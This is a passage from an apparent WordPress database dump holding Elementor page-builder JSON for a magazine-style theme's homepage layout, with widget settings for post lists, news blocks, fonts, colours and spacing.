ize_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1280,455,'_elementor_version','0.4'),(1281,455,'_elementor_css','a:3:{s:4:\"time\";i:1508893879;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1283,456,'_elementor_edit_mode','builder'),(1284,456,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLin